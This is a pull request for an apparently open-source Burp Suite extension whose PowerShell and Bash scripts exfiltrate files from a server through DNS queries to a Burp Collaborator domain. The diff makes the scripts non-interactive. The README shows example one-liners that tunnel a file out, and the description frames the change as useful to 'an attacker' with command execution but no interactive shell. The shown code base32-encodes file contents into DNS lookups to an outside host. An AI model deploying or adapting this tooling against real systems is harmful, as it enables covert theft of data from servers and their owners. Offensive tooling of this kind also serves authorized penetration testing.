### PR TITLE
Allow non-interactive usage of the scripts

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@ A DNS tunnel utilizing the Burp Collaborator.
 
 This extension sets up a private Burp Collaborator server as a DNS tunnel.  One of the provided scripts will be used to exfiltrate data from a server through the DNS tunnel, displaying the tunneled data in Burp Suite.
 
-### Usage with scripts
+### Interactive usage with scripts
 Multiple scripts exist for exfiltrating data from different environments.  The scripts will be set up on the box to exfiltrate data from and will connect to a Burp Suite instance on our local box.
 
 _[B] Burp Suite_
@@ -16,6 +16,20 @@ _[S] Script_
 4) [S] Enter the Burp Collaborator address from (2) when prompted
 5) [S] Paste file name to be tunneled when prompted
 6) [B] After tunneling is completed click "Poll now"
+
+### Non-interactive usage with scripts
+The scripts don't require user interaction if all the necessary information is provided as arguments. 
+
+_[B] Burp Suite_
+
+_[S] Script_
+
+1) [B] Click "Start listening"
+2) [B] Copy the printed location of the Burp Collaborator server
+3) [S] Run the script
+    - Windows: `./tunnel.ps1 abc123.private-burp.com .\test.txt`
+    - Linux: `./tunnel.sh -d abc123.private-burp.com -f test.txt`
+4) [B] After tunneling is completed click "Poll now"
 
 ### Usage between 2 Burp Suite instances
 _[R] Receiving Burp instance_

--- a/scripts/tunnel.ps1
+++ b/scripts/tunnel.ps1
@@ -1,5 +1,12 @@
 [CmdletBinding()]
-param()
+param(
+    [parameter(
+        Mandatory = $true, HelpMessage="Burp Collaborator address")]
+    $collabDomain,
+	[parameter(
+        Mandatory = $true, HelpMessage="File to exfiltrate")]
+    $exfilFile
+)
 $characterSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
 $dnsFlag="nspi";
 $amountFlag="amount";
@@ -21,9 +28,7 @@ Function Encode-Base32($data) {
   return $encodedData
 }
 
-#Read in the collaborator address and the data to exfil
-$collabDomain = Read-Host -Prompt 'Burp Collaborator address'
-$exfilFile = Read-Host -Prompt 'File to exfiltrate'
+#Read the contents of the file to exfiltrate
 $exfilData = Get-Content $exfilFile | Out-String
 
 #Convert data to base32

--- a/scripts/tunnel.sh
+++ b/scripts/tunnel.sh
@@ -83,7 +83,7 @@ fi
 
 #Convert data to base32, space into 63-character chunks, delimit on spaces
 #The base32 program might not be included, might want to write base32 encoding into here
-data="$(cat $exfilFile | base32)"
+data="$(cat $exfilFile | base32 --wrap=0)"
 data="$(echo $data | sed -r 's/(.{63})/\1 /g')"
 data="$(echo $data| tr = ' ')"
 

--- a/scripts/tunnel.sh
+++ b/scripts/tunnel.sh
@@ -1,23 +1,89 @@
 #!/bin/bash
+
+#########################
+# Help Message          #
+#########################
+display_help() {
+    echo "Usage: $0 [option...]" >&2
+    echo
+    echo "   -h, --help                 This help message            "
+    echo "   -d, --domain               The burp collaborator domain "
+    echo "   -f, --file                 The file to be exfiltrated   "
+    echo "   -v, --verbose              Enables verbose output       "
+    echo
+    exit 1
+}
+
+#Setup various variables
 dnsFlag="nspi"
 amountFlag="amount"
-
+collabDomain=
+exfilFile=
 verbose=
 
-case "$1" in (-v|--v|--ve|--ver|--verb|--verbo|--verbos|--verbose)
-    verbose=1
-    shift ;;
-esac
+#Process command line args
+while :
+do
+    case "$1" in
+      -h | --help)
+          display_help  # Call your function
+          exit 0
+          ;;
 
-echo -n "Burp Collaborator address: "
-read collabDomain
+      -d | --domain)
+          collabDomain="$2"
+          shift 2
+          ;;
 
-#Read in data to exfiltrate
-echo -n "File to exfiltrate: "
-read data
+      -f | --file)
+          exfilFile="$2"
+          shift 2
+          ;;
+
+      -v | --v | --ve | --ver | --verb | --verbo | --verbos | --verbose)
+          verbose=1
+          shift
+          ;;
+
+      --) # End of all options
+          shift
+          break
+          ;;
+      -*)
+          echo "Error: Unknown option: $1" >&2
+          ## or call function display_help
+          exit 1 
+          ;;
+      *)  # No more options
+          break
+          ;;
+    esac
+done
+
+#If parameters aren't provided, prompt for them
+if [[ ! $collabDomain ]]
+then
+    echo -n "Burp Collaborator address: "
+    read collabDomain
+else
+    if [ "$verbose" = 1 ]; then
+        echo "Burp Collaborator address: $collabDomain"
+    fi
+fi
+
+if [[ ! $exfilFile ]]
+then
+    echo -n "File to exfiltrate: "
+    read exfilFile
+else
+    if [ "$verbose" = 1 ]; then
+        echo "File to exfilrate: $collabDomain"
+    fi
+fi
+
 #Convert data to base32, space into 63-character chunks, delimit on spaces
 #The base32 program might not be included, might want to write base32 encoding into here
-data="$(cat $data | base32)"
+data="$(cat $exfilFile | base32)"
 data="$(echo $data | sed -r 's/(.{63})/\1 /g')"
 data="$(echo $data| tr = ' ')"
 


### PR DESCRIPTION
Currently, the scripts require user interaction. They prompt for user input at the start of execution and won't continue unless the values are typed in. This could be a problem in the scenario where an attacker has command execution, but not an interactive shell. 

I've updated the scripts so that the two input values (domain and filename) can be provided at the command line when calling the script. If these are provided, the script won't require user interaction and it will complete on its own. 

I took care to ensure that the legacy behavior is maintained if the values are not provided at the command line. 